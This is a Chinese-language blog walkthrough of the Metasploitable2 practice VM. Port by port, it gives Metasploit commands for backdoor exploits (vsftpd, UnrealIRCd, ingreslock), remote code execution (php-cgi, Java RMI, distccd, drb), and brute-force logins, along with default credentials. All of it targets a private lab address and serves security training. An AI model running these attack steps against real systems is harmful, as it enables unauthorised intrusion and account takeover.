Metasploit2通關教程

阜城小柳發表於2023-01-31

Metasploitable2靶機介紹:

Metasploitable2 虛擬系統是一個特別製作的ubuntu作業系統,本身設計作為安全工具測試和演示常見漏洞攻擊。這個版本的虛擬系統相容VMware。當虛擬系統啟動之後,使用使用者名稱:msfadmin 和密碼msfadmin登陸 適用於學習網路安全新手學習

Metasploitable2靶機下載:

https://pan.baidu.com/s/1SE1xoRtXMsrj_34FJQXT2Q
提取碼:810r

Metasploitable2靶機安裝:

下載好了把安裝包解壓 然後試用VMware即可。

Metasploit2通關教程

Metasploitable2靶機漏洞詳解:

滲透機:kali IP :192.168.28.128

靶機IP :192.168.28.141

Metasploit2通關教程

漏洞清單:

Metasploit2通關教程

21埠

search vsftpd
use 0
set rhosts 192.168.28.141
run

Metasploit2通關教程

22埠==直接暴力破解

Search  ssh_login       搜尋模組
Use  auxiliary/scanner/ssh/ssh_login    使用模組
Set  RHOST 192.168.28.141    設定目標地址
Set   USER_FILE  XXX   設定使用者字典路徑
Set   PASS_FILE  XXX   設定字典密碼路徑
Set   THREADS   100   設定執行緒是100
Run  

Metasploit2通關教程

Metasploit2通關教程

Metasploit2通關教程

23埠(telnet):

search telnet_login
use 1
Set  RHOST 192.168.28.141    設定目標地址
Set   USER_FILE  XXX   設定使用者字典路徑
Set   PASS_FILE  XXX   設定字典密碼路徑
Set   THREADS   100   設定執行緒是100
Run  

Metasploit2通關教程

Metasploit2通關教程

80埠

Metasploit2通關教程

拿到站點進行滲透老套路====資訊蒐集啥的

Metasploit2通關教程

Metasploit2通關教程

search php-cgi
use 0
set rhost 192.168.28.141
run
background====將shell後置後臺

Metasploit2通關教程

Metasploit2通關教程

139埠,445埠

這兩個都是smb型別的,是共享服務,首選我們需要知道它的共享目錄有哪些,列舉之後可看到一共發現有5個如下

search smb_eumn
  	  0  auxiliary/scanner/smb/smb_enumshares
use 0
set rhost 192.168.28.141

Metasploit2通關教程

在使用一個指令碼:use auxiliary/admin/smb/samba_symlink_traversal

Metasploit2通關教程

1099埠

一個Java反序列化命令執行漏洞,可以看到已經getshell

原理:Java RMI Server 的RMI登錄檔和RMI啟用服務的預設配置存在安全漏洞,可被利用導致

search java rmi
		4   exploit/multi/misc/java_rmi_server  
use 4
set rhosts 192.168.28.141
run

Metasploit2通關教程

1524埠ingreslock

在少數伺服器上存在一個古老的令人驚訝的“ingreslock”後門,監聽1524埠。在過去的十年裡,它經常被用於入侵一個暴露的伺服器。它的利用是如此簡單。

telnet 192.168.28.141 1524

Metasploit2通關教程

3306資料庫預設埠

既然執行遠端連線,直接爆破,賬號root密碼為空然後登入

使用模組:use auxiliary/scanner/mysql/mysql_login

search mysql_login
use 0
set username root

Metasploit2通關教程

Metasploit2通關教程

3632 distccd服務

遠端命令執行漏洞,直接exp

使用模組:use exploit/unix/misc/distcc_exec

search distccd
use 0
set rhost 192.168.28.141

Metasploit2通關教程

後面幾個利用教程就不詳細展開了!!!

5432埠

postgresq爆破

5900埠vnc服務

vnc服務有兩部分構成,一部分是服務,一個是客戶端,我們進行爆破

使用模組爆破:use auxiliary/scanner/vnc/vnc_login

6667埠

6697 IRC服務, IRC服務這個版本存在後門漏洞,直接exp後getshell

使用模組:use exploit/unix/irc/unreal_ircd_3281_backdoor

8180埠

暴力破解賬號密碼:tomcat;tomcat

8787埠drb服務

有個遠端程式碼執行漏洞

使用模組:use exploit/linux/misc/drb_remote_codeexec

相關文章